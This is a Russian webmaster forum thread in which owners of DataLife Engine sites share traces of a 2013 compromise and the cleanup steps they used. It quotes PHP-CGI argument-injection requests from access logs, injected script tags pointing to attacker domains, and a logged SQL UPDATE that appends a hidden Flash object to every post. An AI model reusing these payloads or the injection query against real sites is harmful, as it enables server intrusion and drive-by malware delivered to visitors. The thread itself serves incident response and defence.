irazumkov

Рейтинг
41
Регистрация
13.09.2013

ничего не стояло, голый двиг.

91.224.160.25 - - [09/Sep/2013:19:56:49 +0400] "POST /?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 200 16 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ko-kr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" "-"
91.224.160.25 - - [09/Sep/2013:19:56:49 +0400] "POST /phppath/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2f%2finput+-n HTTP/1.1" 200 16 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)" "-"

вот такую бяку еще нашел в логах

нету шелов, ни я ни техподдержка хостинга не нашли новых каких-либо файлов...

/ru/forum/comment/12138030

коперну пост, как я решил проблему.

почистил КЭШ и обновил пароли и поставил заплатку с офф сайта.

пока спокойно все

---------- Добавлено 13.09.2013 в 10:30 ----------

ProLiant:
Нет, заплатка эта точно не помогает! Ломают в другую дыру. Сегодня уже модификация появилась, вида:
<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>


Тоже, сколько не пытаюсь найти шелл в файлах двига - ничего не нахожу. :( И действительно, в шаблоне правил сайта внизу тоже эта гадость добавляется.

аналогично, искал шелл, ничего не нашел...видимо где-то дыра хорошая.

Понять бы каким образом был получен доступ к базе....

также можно проапдейтить через phpmyadmin

update dle_post set short_story = left(short_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', short_story) > 0 limit 20000



update dle_post set full_story = left(full_story, locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story)-1) WHERE locate('<script async="async" type="text/javascript" src="http://google-webmaster.ru/', full_story) > 0 limit 20000

для полной и краткой новости, выполнить несколько раз, пока не буддет выдаваться: изменено 0 строк.

<script async="async" type="text/javascript" src="http://google-webmaster.ru/

вот эту бяку можно изменить и под <object, перед этим удостовериться, что у Вас в базе нет подобных нужных строк.

Обязательно поменять пароли, очистить кэш и поставить все фиксы для DLE.

Если кто не может справиться ,пишите в личку, помогу.

вот виновник [95.143.193.61], 205.204.90.114 и так же с локалхоста.

# Time: 130911 12:07:05
# User@Host: user[user] @ [95.143.193.61]
# Query_time: 17.477933 Lock_time: 0.021231 Rows_sent: 0 Rows_examined: 99297196
use base;
SET timestamp=1378886825;
UPDATE `base`.`dle_post`
SET
`short_story` = CONCAT(`short_story`, '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1315661091"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?783744512" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>'),
`full_story` = CONCAT(`full_story`, '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?389922127"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1068643096" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>')
WHERE
ID IN (
SELECT ID
FROM (
SELECT ID
FROM `base`.`dle_post`
WHERE `short_story` NOT LIKE '%webmasters-yandex.ru%' AND `full_story` NOT LIKE '%webmasters-yandex.ru%'
LIMIT 0,1000
) as p
);
1 234
Всего: 35